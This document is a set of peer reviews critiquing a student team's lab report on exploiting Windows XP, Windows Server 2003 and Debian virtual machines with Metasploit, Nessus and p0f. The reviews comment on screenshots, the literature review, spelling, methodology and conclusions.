In the findings section of the laboratory report, team two identified the three systems that were to be tested; Windows XP RTM VM, Windows XP SP3 VM and Windows Server 2003 VM. The team also attempted to test Debian, but did not seem to have any luck with it. Group two, like other groups had success exploiting Windows XP service pack 0, but the group was unable to exploit Windows XP service pack 3. I agree from my group’s experience with the statement “After examining the list of available exploits in metasploit as well as the other programs on the backtrack VM it was obvious that a fully patched Windows XP service pack three machine was not exploitable without running any third party programs.” Team two also encountered the same problems as other groups when trying to exploit Windows Server 2003, it just was not going to happen.
In the issue section, group two listed the inability for the tools to exploit Windows XP service pack 3, Windows Server 2003 and Debian. The group also had problems with the Metasploit website.
In the conclusion section, group two concluded that tools are not the end all be all of penetration testing.
I considered this team’s literature review to be rather interesting in style. I also appreciated the effort shown by attempting to exploit four machines over the required three. I thought the team did an excellent job in detailing a precise method for attack; this was strong point over many other teams’ write-ups. I was also impressed with the sheer number of screenshots, although some problems existed with these.
That there were problems with this team’s write up is quite obvious even by casual glance. The aforementioned screenshots, while numerous, were severely misshapen. Additionally, large images of console windows full of ping returns served little purpose, other than perhaps to fill space. As these screenshots had no title, nor were they referenced in the body of the report, the reader was left to puzzle out what the significance of each was. Particularly mysterious was the last screenshot (Figure 6), as three Windows based operating systems were examined in the exercise: was this Server 2003 or XP Service Pack 3?
The team’s literature review, while intriguing, seemed to be composed of random statements at some points. For instance, the reference to ‘Subversion;’ was this intended to be tongue in cheek? For a team which has members who continually exhort others to scholarly excellence, this seems far out of place. In addition to this, the long quoted passage near the end of the section was exactly what it appeared to be at first glance: largely a waste of space. Furthermore, while this team seemed willing to discuss concepts related to the articles, much of it seemed designed to ‘address’ the article without actually speaking about the article (the USB discussion, for instance). Finally, although not confined only to the literature review, the writing was riddled with spelling errors. Truthfully, it must be asked: does the team possess a spellchecker? If not, many free implementations exist; to leave so many obvious spelling errors in a final draft is really inexcusable.
An analysis of the ‘Methods’ and ‘Findings’ section reveals that the bulk of the ‘Findings’ are really items of methodology. As to the methodology itself, I find it odd that the targets were used to ‘ping’ the attacker so that ‘passive’ fingerprinting could be done. Does this really make any sense at all with respect to concept of passive reconnaissance? It seems to me to be wholly artificial, as it is nearly certain that this will not happen in a ‘real’ situation. It might have been a superior idea to use general web browsing traffic, or Server Message Block transactions to simulate client activity (such as other groups did).
The discussion on NESSUS biases was reasonably thorough, although a few of the assertions seemed ill-conceived. Does it really seem that NESSUS is biased toward showing Windows vulnerabilities? From prior exercises, it is well understood that the number of NESSUS plug-ins which target UNIX based systems is by far in the majority. How, with this superiority of numbers in mind, is it that NESSUS consistently finds more areas of vulnerability in Windows based systems? Would not this be more indicative of problems in the Windows operating system, or a ‘bias’ in the target, if it is true? Being further critical, I did not see a thorough discussion of the effect of a specific OSI layer exploits on other levels of the stack. It is true, as this team presents, that it might be possible for an attacker to change information ‘rising’ in the stack: however, it seem that a discussion of encryption should somehow be justified to this concept. I was also unsatisfied with the discussion of OSI layer biases as applied to penetration testing: I think there is more going on with the issue than “developer neglect” of the lower layers. Finally, the conclusion did not do this team’s overall effort justice; a conclusion is the ‘last chance’ to make a good impression on the reader: it must be admitted that this reader was left disappointed.
I think that group 2’s write-up for lab 6 was very good. The abstract for this lab was good and accurately described the laboratory. The literary review was good and adequately reviews the material. Group 2 answered all of the required questions for each reading. All of the citing for the literary review was done correctly. For this lab, the group answered all of the required questions and provided a good amount of detail about the steps that they used to exploit the target systems. However, the group did not try newer methods of passive OS fingerprinting, which could have made their detections less reliable. P0f is an older program. While it still works, Ettercap-ng appears to give more accurate passive OS fingerprints. Also, the group did not get into the specifics of what types of exploits they successfully ran on the target system. Finally, the conclusion was written well and accurately sums up the laboratory.
Team two presents a report that is complete but could use more detail. There is an odd shift in voice for the literature review that interrupts the flow of the document. Please use external writing resources as necessary to provide the best possible finished product.
The abstract gives a good introduction to the topic and what the group will be doing in the lab. The group states that using automated exploit tools is a new idea in the realm of the penetration tester. What have they done before? Were penetration testers just that good? Were they idiots that had no idea about hacker trends?
The literature review is not simply a list of articles. The group gives lengthy summarizations of the various articles, but does not discuss them in depth. This indicates a lack of effort, a lack of comprehension, or both. How do the articles relate to the lab? How do they relate to each other? Is there value in what the Authors say? Why or why not?
The methods section is well detailed, but lacks the exact steps the group took to complete the lab and is therefore not repeatable. If the literature review is a standard part of the documentation, do you need to mention it in the methods section?
Your findings section contains details that should have been included in your methods. Why is it that you could not crack either the XP SP3 machine or the Debian Machine? Is there something about the lab environment that makes it unrealistically hard?
Why did you wait until the weekend to work on the lab? Your conclusion is valid, but lacks depth. It appears that you did not get the results you expected. Why is this so?